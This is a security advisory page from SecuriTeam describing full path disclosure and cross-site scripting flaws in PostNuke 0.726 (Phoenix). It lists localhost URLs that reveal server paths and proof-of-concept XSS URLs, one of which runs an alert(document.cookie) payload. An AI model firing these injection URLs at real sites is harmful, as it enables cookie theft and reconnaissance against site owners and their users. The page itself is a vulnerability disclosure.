SecuriTeam - Multiple Vulnerabilities in PostNuke Phoenix

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

"PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place."

The vulnerabilities found in PostNuke Phoenix are full path disclosure and cross-site scripting.

Credit:
The information has been provided by Janek Vind.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* PostNuke version 0.726 (Phoenix)

Full Path Disclosure
All blocks in the '/include/blocks/' directory reveal their true path if they are access directly (without the proper parameters).

Example:
Accessing the following URL: http://localhost/postnuke0726/includes/blocks/finclude.php, will reveal:
Fatal error: Call to undefined function: pnsecaddschema() in D:\apache_wwwroot\postnuke0726\includes\blocks\finclude.php on line 44

Other scripts are also vulnerable:
http://localhost/postnuke0726/pnadodb/drivers/adodb-access.inc.php
http://localhost/postnuke0726/modules/NS-NewUser/user.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
http://localhost/postnuke0726/modules/NS-LostPassword/user.php
http://localhost/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/head.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/print.inc.php
http://localhost/postnuke0726/modules/NS-User/tools.php
http://localhost/postnuke0726/modules/NS-User/user.php

Cross-site Scripting
The following XSS attacks are only possible if PostNuke has been made to use its anti-filtering. Accessing any of the below URLs will trigger the execution of the [xss code here] block. http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>

	Publique! CMS and SQL Injection Vulnerabilities
	Files2Links F2L-3000 SQL Injection Vulnerability
	HP-UX Running Apache Data Injection and DoS Vulnerability
	MIT krb5 KDC denial of service in cross-realm referral processing
	AproxEngine Multiple Vulnerabilities
	APC Switched Rack PDU XSS Vulnerability
	HP-UX Running OpenSSL Unauthorized Data Injection and Denial of Service
	HP OpenView NNM snmpviewer.exe CGI Host Header Stack Overflow Vulnerability
	HP OpenView NNM ovwebsnmpsrv.exe OVwSelection Stack Overflow Vulnerability
	HP-UX Running VRTSweb Remote Execution of Arbitrary Code and Privilege Escalation
	FreeBSD SSL and TLS Session Renegotiation vulnerability
	CoreHTTP Web Server Buffer Overflow Vulnerability
	HP OpenView Network Node Manager DoS Vulnerability
	ToutVirtual VirtualIQ Multiple Vulnerabilities
	Transport Layer Security Renegotiation Vulnerability